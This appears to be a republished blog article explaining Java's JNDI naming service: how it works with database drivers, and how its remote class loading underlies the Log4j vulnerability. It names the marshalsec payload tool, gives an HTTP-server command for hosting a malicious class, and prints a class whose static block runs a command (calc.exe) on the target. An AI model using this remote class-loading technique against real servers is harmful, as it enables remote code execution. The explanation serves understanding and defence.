BestHub
Sign in
Information Security 6 min read

Why JNDI Is the Hidden Threat Behind Log4j and Other Java Vulnerabilities

The article explains how JNDI works as a configuration and naming service in Java, shows its use with database drivers, and demonstrates how its SPI mechanism can be abused to load remote code, leading to serious security exploits such as the Log4j vulnerability.

macrozheng
macrozheng
macrozheng
Why JNDI Is the Hidden Threat Behind Log4j and Other Java Vulnerabilities

Database Driver

Many developers first encounter JNDI through database drivers, but with modern Spring Boot monolithic deployments this practice is becoming rare.

For example, a Tomcat server.xml can define a resource named jdbc/xjjdogDB:

<Resource name="jdbc/xjjdogDB" auth="Container" type="javax.sql.DataSource"
    maxTotal="100" maxIdle="30" maxWaitMillis="10000"
    username="xjjdog" password="123456" driverClassName="com.mysql.jdbc.Driver"
    url="jdbc:mysql://localhost:3306/xjjdog_db"/>

Spring Boot can then reference this JNDI name in its configuration, provided the application is packaged as a WAR and deployed to an enterprise server such as JBoss:

spring:
  datasource:
    jndi-name: jdbc/xjjdogDB

JNDI acts as a configuration center or naming service, allowing a short string to retrieve complex configuration objects, effectively a key‑value map.

Danger Comes From Here

The retrieved value is often an Object, and converting a string to an arbitrary class requires reflection, which opens a security hole.

JNDI’s SPI mechanism can interact with LDAP, RMI and other protocols, enabling remote code loading.

When NamingManager calls getObjectFactoryFromReference and cannot find a local class, it will fetch and instantiate a class from a remote location.

An attacker can run a simple HTTP server to serve a malicious .class file, which JNDI will load: python -m http.server 8000 Tools such as marshalsec can generate the required payloads.

Example malicious class that executes a command on the target machine:

public class a {
    static {
        try {
            String[] cmd = {"calc.exe"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Deploying this class allows the server to launch the calculator (or any other command), illustrating the severe risk.

END

Java reflection and the SPI feature are powerful but dangerous; they expose critical vulnerabilities when misused, as seen in the Log4j exploit. The article questions why such capabilities are embedded in a logging framework.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

javalog4jExploitJNDI
macrozheng
Written by

macrozheng

Dedicated to Java tech sharing and dissecting top open-source projects. Topics include Spring Boot, Spring Cloud, Docker, Kubernetes and more. Author’s GitHub project “mall” has 50K+ stars.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment